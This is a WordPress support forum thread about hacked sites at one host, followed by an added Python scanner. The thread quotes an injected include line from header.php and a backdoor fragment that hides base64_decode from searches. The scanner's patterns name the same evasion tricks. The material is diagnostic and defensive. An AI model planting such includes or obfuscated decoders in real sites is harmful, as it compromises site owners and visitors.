Title: header.php file getting hacked
Last modified: August 21, 2016

---

# header.php file getting hacked

 *  [shawn00m](https://wordpress.org/support/users/shawn00m/)
 * (@shawn00m)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/)
 * I’m experiencing a hacking problem with most of my WordPress installations. There
   are two things that are happening. First a new php file is uploaded to the
   wp-includes folder. What this file does, I do not know. I don’t understand PHP well
   enough. I would be happy to share it if it would help.
 * The second thing is a piece of code that is inserted after the opening body tag
   in the header.php file. Here is a sample of this code:
    `<?php /* start_extra_placement_*/
   @include_once("/home/content/54/9357554/html/wp-includes/Oyk5.php"); /* end_extra_placement_*/ ?>`
 * This problem is across multiple hosting accounts, although they are all hosted
   at GoDaddy. If anyone has any insights as to how these hackers are getting in
   and how I can prevent them from coming back, I would love to know. Thank you.

Viewing 10 replies - 1 through 10 (of 10 total)

 *  [Pioneer Web Design](https://wordpress.org/support/users/swansonphotos/)
 * (@swansonphotos)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709307)
 * It may prove beneficial to the community to use pastebin.com to share that file
   by linking to it here and also use Sucuri to scan your site and share any results
   also.
 *  Thread Starter [shawn00m](https://wordpress.org/support/users/shawn00m/)
 * (@shawn00m)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709319)
 * Thank you for your reply. Here is a link to the file at pastebin:
    [**Moderator Note: Removed link to code used to exploit site**]
 *  [Pioneer Web Design](https://wordpress.org/support/users/swansonphotos/)
 * (@swansonphotos)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709378)
 * Please rebuild site:
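 *     ```
       function current($token)
       {
           // The name base64_decode is assembled from fragments, so a plain-text search for it misses this line.
           $func = 'ba' . 'se' . '6' . '4' . '_' . 'de' . 'co' . 'de';
           return unserialize($func($token));
       }
       ```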
   
 * Is malicious base64 eval code.
 *  [The Hack Repair Guy](https://wordpress.org/support/users/tvcnet/)
 * (@tvcnet)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709471)
 * Your site has been compromised.
 * Start by changing all passwords (FTP/GoDaddy/admins).
 * Then update WordPress, plugins and themes.
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709472)
 * You need to start working your way through these resources:
    [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Anything less will probably result in the hacker walking straight back into your
   site again.
 * Additional Resources:
    [Hardening WordPress](http://codex.wordpress.org/Hardening_WordPress)
   [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/)
   [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/)
   [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
 *  Thread Starter [shawn00m](https://wordpress.org/support/users/shawn00m/)
 * (@shawn00m)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709473)
 * Seacoast Web Design, I’m not understanding your comment.
 * To others, I know my site was hacked. 13 of my sites were hacked on the same 
   day at the same time over various hosting accounts. This isn’t one site with 
   one PW.
 * My questions:
 * Has anyone ever experienced something similar?
   Any suggestions on how all of the sites were hit simultaneously?
   Any advice to prevent it from happening again?
 * Thank you.
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709475)
 * > Has anyone ever experienced something similar?
 * We see hacked sites every day here, unfortunately. 🙁
 * > Any suggestions on how all of the sites were hit simultaneously?
 * Were they all on the same server or with the same hosts? Many hosts experienced
   problems due to [mass attacks](http://blog.hostgator.com/2013/04/11/global-wordpress-brute-force-flood/)
   recently. Your hosts may have been one of them.
 * > Any advice to prevent it from happening again?
 * Review [Hardening WordPress](http://codex.wordpress.org/Hardening_WordPress) 
   as suggested above.
 *  Thread Starter [shawn00m](https://wordpress.org/support/users/shawn00m/)
 * (@shawn00m)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709479)
 * Thanks esmi. There were a total of 13 sites hacked on 5 different hosting accounts
   – all of them at GoDaddy – all at 5:17pm on May 18.
 * A colleague of mine had the same issue the next day with 11 of his WP sites on
   4 different hosting accounts – again all at GoDaddy.
 * The big difference between his attacks and mine is that his hack included the
   installation of content and links related to ED medication. This caused one of
   his sites to get flagged by Google. None of mine experienced that, but the method
   was otherwise almost identical.
 * While I’m trying to get help to prevent this, I also am trying to alert people
   to look at their sites for a similar attack. I wouldn’t have known I was hacked
   if my colleague didn’t tell me about his hacks. After seeing his sites, I checked
   my own and found the offending code.
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709486)
 * > all of them at GoDaddy – all at 5:17pm on May 18
 * GoDaddy were definitely one of the hosts hit by the mass attacks. I assume you
   meant April 18 – not May 18, yes? If not, I’d like a ride in your time machine.
   😉
 *  Thread Starter [shawn00m](https://wordpress.org/support/users/shawn00m/)
 * (@shawn00m)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709519)
 * esmi, yes, it was April 18, not May 18. I wish I had a time machine to go back
   and catch the bums that did this. Thanks for your info. The Hardening WordPress
   info is helpful.
 * I also found a plugin called Better WP Security. It does many of the things suggested
   on that page. Are you – or anyone reading this – familiar with it?


The topic ‘header.php file getting hacked’ is closed to new replies.
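
As an added example (not part of the thread and not any participant's code), the two artifacts posted above, the marked `@include_once` in header.php and the function name assembled from string fragments, can be searched for across a WordPress tree like this. The sample strings, the path in them and the `SENSITIVE` list are constructed for illustration.

```python
import re
from pathlib import Path

# Function names that PHP backdoors often assemble from string fragments (illustrative list).
SENSITIVE = {"base64_decode", "eval", "assert", "gzinflate", "str_rot13"}
MARKER = "start_extra_placement_"  # comment marker from the sample posted in this thread
# Error-suppressed include/require of a .php file by absolute path.
INCLUDE = re.compile(r"""@\s*(?:include|require)(?:_once)?\s*\(\s*['"](/[^'"]+\.php)['"]""")
# Two or more quoted literals joined by PHP's "." concatenation operator.
QUOTED = "(?:'[^']*'|\"[^\"]*\")"
CONCAT_RUN = re.compile(QUOTED + r"(?:\s*\.\s*" + QUOTED + r")+")
LITERAL = re.compile("'([^']*)'|\"([^\"]*)\"")

def scan_php(source):
    """Return (line_number, finding) tuples for one PHP source string."""
    findings = []
    for n, line in enumerate(source.splitlines(), 1):
        if MARKER in line:
            findings.append((n, "injection marker"))
        m = INCLUDE.search(line)
        if m:
            findings.append((n, "suppressed include: " + m.group(1)))
        for run in CONCAT_RUN.finditer(line):
            # Join the fragments the way PHP would at run time, then compare.
            name = "".join(a or b for a, b in LITERAL.findall(run.group(0))).lower()
            if name in SENSITIVE:
                findings.append((n, "concatenated function name: " + name))
    return findings

def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for files with hits."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan_php(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed samples modelled on the snippets in this thread (path is a placeholder).
SAMPLE_HEADER = '''<body>
<?php /* start_extra_placement_*/
@include_once("/var/www/example/wp-includes/Xx00.php"); /* end_extra_placement_*/?>
<?php include("sidebar.php"); ?>
'''
SAMPLE_DROPPER = """<?php
$func = 'ba' . 'se' . '6' . '4' . '_' . 'de' . 'co' . 'de';
$title = 'Hello' . ' ' . 'world';
"""
```

A hit from `scan_tree` marks a file for manual review and for comparison against a clean copy of the same WordPress, theme or plugin version; a clean result does not show that a site is uncompromised.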

## Tags

 * [header](https://wordpress.org/support/topic-tag/header/)
 * [header.php](https://wordpress.org/support/topic-tag/header-php/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 10 replies
 * 4 participants
 * Last reply from: [shawn00m](https://wordpress.org/support/users/shawn00m/)
 * Last activity: [13 years, 1 month ago](https://wordpress.org/support/topic/headerphp-file-getting-hacked/#post-3709519)
 * Status: not resolved

